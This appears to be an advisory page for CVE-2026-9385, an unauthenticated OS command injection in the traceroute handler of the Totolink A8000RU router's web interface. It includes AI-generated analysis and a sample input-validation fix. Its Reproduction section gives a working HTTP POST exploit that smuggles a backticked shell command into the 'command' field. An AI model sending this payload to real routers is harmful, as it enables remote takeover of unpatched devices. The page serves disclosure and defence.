VYPR
Unrated severity · NVD Advisory · Published May 24, 2026

Totolink A8000RU Web Management cstecgi.cgi setTracerouteCfg os command injection

CVE-2026-9385

Description

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. It affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi in the Web Management Interface component. Manipulating the argument command results in OS command injection. The attack can be carried out remotely. The exploit has been publicly disclosed and may be used.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Totolink A8000RU 7.1cu.643_b20200521 is vulnerable to OS command injection via the `command` parameter in the `setTracerouteCfg` function of `/cgi-bin/cstecgi.cgi`.

Vulnerability

The vulnerability resides in the /cgi-bin/cstecgi.cgi script of the Totolink A8000RU router (firmware version 7.1cu.643_b20200521). The setTracerouteCfg function reads a user-supplied command parameter, inserts it into a buffer via snprintf, and passes it to CsteSystem, which ultimately calls execv(). The input is not sanitized or validated, allowing arbitrary OS command injection. The affected firmware was downloaded from the vendor's official download page [1].

Exploitation

An unauthenticated remote attacker can send a crafted HTTP POST request to /cgi-bin/cstecgi.cgi with a JSON payload containing a malicious command value. The public proof-of-concept (PoC) sends command as `ls>./setTracerouteCfg.txt` wrapped in backticks, which causes the router to execute the `ls` command and write its output to a file [1]. No authentication or prior access is required; exploitation is carried out over the network.

Impact

Successful exploitation allows the attacker to execute arbitrary operating system commands on the router with the privileges of the web server (likely root). This can lead to full device compromise, including data exfiltration, installation of persistent backdoors, lateral movement within the network, and disruption of device operations. The CIA triad is completely undermined [1].

Mitigation

As of the reference publication date (2026-05-24), no official patch or updated firmware has been released by Totolink. Users are advised to restrict remote access to the web management interface, place the device behind a firewall, and monitor for any vendor updates. If the device is no longer supported, replacement with a currently supported model may be necessary. This vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input validation on the `command` parameter allows arbitrary OS commands to be injected and executed via `execv()`."

Attack vector

An unauthenticated remote attacker sends a crafted POST request to `/cgi-bin/cstecgi.cgi` with a JSON body containing the `topicurl` set to `setTracerouteCfg` and a `command` parameter that includes arbitrary OS commands wrapped in backticks. The `command` value is passed unsanitized through `snprintf` into a buffer that is later executed by `execv()` in `CsteSystem`, resulting in OS command injection [ref_id=1]. No authentication or special privileges are required beyond network access to the router's web interface.

Affected code

The vulnerability resides in the function `sub_423E20` within `/cgi-bin/cstecgi.cgi` of the Web Management Interface. This function reads a user-provided parameter named `command` and inserts it into a buffer `v6` using `snprintf`. The buffer `v6` is then passed to `CsteSystem`, which ultimately executes the string via `execv()` [ref_id=1].

What the fix does

No patch is provided in the bundle. The advisory does not include a vendor fix or remediation guidance. To close this vulnerability, the vendor would need to implement input validation and sanitization on the `command` parameter before it is passed to `snprintf` and subsequently to `CsteSystem`, or avoid passing user-controlled strings to OS execution functions entirely [ref_id=1].
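The two remediation options named above, validating `command` and keeping it away from a shell, can be combined. The following is an added example, not vendor code and not taken from the advisory; the function names, the traceroute binary path and the assumption that `command` should carry only a destination host are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical validator (not vendor code). Assumes `command` is meant to
 * carry only the traceroute destination: a hostname or an IP literal.
 * Backticks, $, ;, |, >, quotes and whitespace all fail the allowlist. */
int traceroute_target_ok(const char *s)
{
    size_t n = s ? strlen(s) : 0;
    if (n == 0 || n > 253 || s[0] == '-')  /* leading '-' would parse as an option */
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '.' && c != '-' && c != ':')
            return 0;
    }
    return 1;
}

/* Hypothetical replacement for the snprintf() + CsteSystem() pattern the
 * advisory describes. The target travels as its own argv element, so no
 * shell parses it. `path` is the traceroute binary (location assumed).
 * Returns the child's exit status, or -1 on rejected input or spawn failure. */
int run_traceroute(const char *path, const char *target)
{
    if (!traceroute_target_ok(target))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)path, (char *)target, NULL };
        execv(path, argv);
        _exit(127);  /* exec itself failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

The allowlist alone would block the published payload; passing the value as a separate argv element removes the shell from the path, so a gap in the validator does not become command execution.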

Preconditions

  • network: Attacker must have network access to the router's web management interface (typically on port 80/443).
  • auth: No authentication is required; the PoC does not include any authentication step beyond a session cookie which may be optional.

Reproduction

Send the following HTTP POST request to the router's `/cgi-bin/cstecgi.cgi` endpoint:

```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 77
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=2:1772465702:2
Connection: keep-alive

{"topicurl":"setTracerouteCfg","command":"`ls>./setTracerouteCfg.txt`"}
```

After submitting, a file named `setTracerouteCfg.txt` is created in the current directory containing the directory listing, confirming command execution [ref_id=1].

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
